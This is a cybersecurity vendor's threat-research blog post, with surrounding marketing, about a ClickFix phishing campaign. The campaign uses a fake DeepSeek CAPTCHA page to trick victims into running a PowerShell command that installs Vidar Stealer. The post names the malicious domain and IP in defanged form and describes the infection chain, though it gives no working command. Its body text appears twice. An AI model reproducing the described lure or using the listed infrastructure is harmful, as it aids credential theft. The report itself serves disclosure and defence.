🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥
Proactively monitor and defend your organization against threats from the dark web with CloudSEK XVigil.
Schedule a DemoThreat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.
CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam where victims are tricked into clicking on a malicious link that appears to be a captcha verification. These links often lead to the installation of malware, such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained this in detail.
1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain with the name deepseekcaptcha[.]top The domain was hosted behind Cloudflare and was used to display a fake DeepSeek blogger theme offer.
2. The WHOIS record shows that the domain was registered on January 31, 2025. The domain uses Cloudflare's hosting services to mask its true nature and evade detection from AI-based search engines, allowing it to remain undetected for an extended period.
3. While analyzing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the malicious webpage’s landing page would copy a malicious PowerShell command, and once the instructions were followed, a malicious file download would begin.
4. The highlighted command in the screenshot reveals that the file named 1.exe was downloaded and subsequently executed from the %TEMP% directory without any user interaction. Upon checking the IP address, 147.45.44[.]209 we found the Directory Listing reveals all the files and script in the campaigns used.
4. Based on the primary static analysis of the downloaded file, 1.exe is classified to be the 1st stage downloader of Vidar Stealer which is used to infect devices and steal information.
5. Further analysis has revealed that the stealer has incorporated social media platforms, such as Telegram and Steam, into its infrastructure to provide updates and support, as well as command-and-control (C2) functionality. This includes embedding the IP address/URL on the profile page, which the malware retrieves during the initial stage of execution.
By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.
Following are the IOCs gathered from the campaign:
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
5
min read
Cybercriminals are exploiting DeepSeek’s rising popularity to launch ClickFix phishing campaigns, tricking users into clicking fake CAPTCHA links that steal credentials and install malware like Vidar and Lumma Stealer. These attacks impersonate DeepSeek’s branding to appear legitimate, bypass security measures, and infect unsuspecting victims. CloudSEK’s Threat Research Team has uncovered a malicious domain distributing malware via deceptive verification buttons. Learn how to spot these scams, secure your accounts with MFA, and avoid becoming the next victim! Stay informed and shield your data NOW before it’s too late! 🔥
Threat actors are exploiting the growing popularity of DeepSeek by launching phishing campaigns that use DeepSeek's brand name. These campaigns aim to steal credentials and distribute malware, including through fake investment schemes.
CloudSEK's Threat Research Team has discovered a domain used to spread Vidar Stealer malware through ClickFix phishing campaigns, a type of scam where victims are tricked into clicking on a malicious link that appears to be a captcha verification. These links often lead to the installation of malware, such as the Lumma Stealer mentioned in this report. A previous blog post, published in September of last year, explained this in detail.
1. On 31 Jan 2025, CloudSEK’s contextual AI URL Analyser detected a domain with the name deepseekcaptcha[.]top The domain was hosted behind Cloudflare and was used to display a fake DeepSeek blogger theme offer.
2. The WHOIS record shows that the domain was registered on January 31, 2025. The domain uses Cloudflare's hosting services to mask its true nature and evade detection from AI-based search engines, allowing it to remain undetected for an extended period.
3. While analyzing the functionality and flow of the phishing site, it became apparent that clicking the “Verificate” button on the malicious webpage’s landing page would copy a malicious PowerShell command, and once the instructions were followed, a malicious file download would begin.
4. The highlighted command in the screenshot reveals that the file named 1.exe was downloaded and subsequently executed from the %TEMP% directory without any user interaction. Upon checking the IP address, 147.45.44[.]209 we found the Directory Listing reveals all the files and script in the campaigns used.
4. Based on the primary static analysis of the downloaded file, 1.exe is classified to be the 1st stage downloader of Vidar Stealer which is used to infect devices and steal information.
5. Further analysis has revealed that the stealer has incorporated social media platforms, such as Telegram and Steam, into its infrastructure to provide updates and support, as well as command-and-control (C2) functionality. This includes embedding the IP address/URL on the profile page, which the malware retrieves during the initial stage of execution.
By following these recommendations, organizations and individuals can significantly reduce their risk of falling victim to phishing attacks and protect themselves from the associated risks of data theft, financial loss, and reputational damage.
Following are the IOCs gathered from the campaign: